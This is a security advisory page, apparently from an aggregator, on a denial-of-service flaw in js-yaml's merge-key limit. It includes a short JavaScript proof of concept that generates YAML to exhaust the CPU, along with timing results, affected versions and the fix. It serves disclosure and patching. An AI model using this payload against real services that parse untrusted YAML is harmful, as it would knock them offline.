Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-2883-xcg3-v3hh

Опубликовано: 08 сент. 2026
Источник: github
Github: Прошло ревью
CVSS3: 7.5

Описание

js-yaml: maxTotalMergeKeys does not limit CPU use for empty merge sources

Summary

maxTotalMergeKeys does not count empty mappings. An attacker can repeatedly merge a large sequence of them and consume significant CPU without reaching the configured limit.

Example

arr: &arr [{}, {}, {}, ...] # N empty mappings targets: - <<: *arr # repeated K times

For every target, the loader iterates all N elements of arr. This results in O(N * K) work while totalMergeKeys remains unchanged.

PoC

import { performance } from 'node:perf_hooks' import { load, YAML11_SCHEMA } from 'js-yaml' const n = 20000 const src = 'arr: &arr [' + '{},'.repeat(n).slice(0, -1) + ']\n' + 'targets:\n' + ' - <<: *arr\n'.repeat(n) const started = performance.now() load(src, { schema: YAML11_SCHEMA }) console.log(`${(performance.now() - started).toFixed(1)} ms`)

Observed results:

NYAML sizeTime
800~13 KB~20 ms
3200~50 KB~180 ms
20000~500 KB~13 s

Impact

An attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default maxTotalMergeKeys limit.

Fix

Count each merge-source mapping as one budget unit, in addition to counting its keys.

Difference with v5

In v3 & v4, merge is enabled by default. So, the severity score is higher.

Пакеты

Наименование

js-yaml

npm
Затронутые версииВерсия исправления

>= 4.0.0, < 4.3.2

4.3.2

Наименование

js-yaml

npm
Затронутые версииВерсия исправления

>= 3.0.0, < 3.15.2

3.15.2

EPSS

Процентиль: 32%
0.00385
Низкий

7.5 High

CVSS3

Дефекты

CWE-400
CWE-407

Связанные уязвимости

CVSS3: 7.5
ubuntu
15 дней назад

(js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15. ...)

CVSS3: 7.5
redhat
15 дней назад

js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15.2 and 4.3.2, maxTotalMergeKeys in lib/js-yaml/loader.js and lib/loader.js does not count empty mapping sources while processing the merge key <<. An attacker can alias a large sequence of empty mappings into many merge targets, causing O(N * K) processing while totalMergeKeys remains unchanged and the configured resource limit is never reached. A relatively small YAML document can therefore cause prolonged CPU consumption in applications that parse untrusted YAML, and merge processing is enabled by default on these release lines. This issue is fixed in versions 3.15.2 and 4.3.2.

CVSS3: 7.5
nvd
15 дней назад

js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15.2 and 4.3.2, maxTotalMergeKeys in lib/js-yaml/loader.js and lib/loader.js does not count empty mapping sources while processing the merge key <<. An attacker can alias a large sequence of empty mappings into many merge targets, causing O(N * K) processing while totalMergeKeys remains unchanged and the configured resource limit is never reached. A relatively small YAML document can therefore cause prolonged CPU consumption in applications that parse untrusted YAML, and merge processing is enabled by default on these release lines. This issue is fixed in versions 3.15.2 and 4.3.2.

CVSS3: 7.5
debian
15 дней назад

js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15. ...

EPSS

Процентиль: 32%
0.00385
Низкий

7.5 High

CVSS3

Дефекты

CWE-400
CWE-407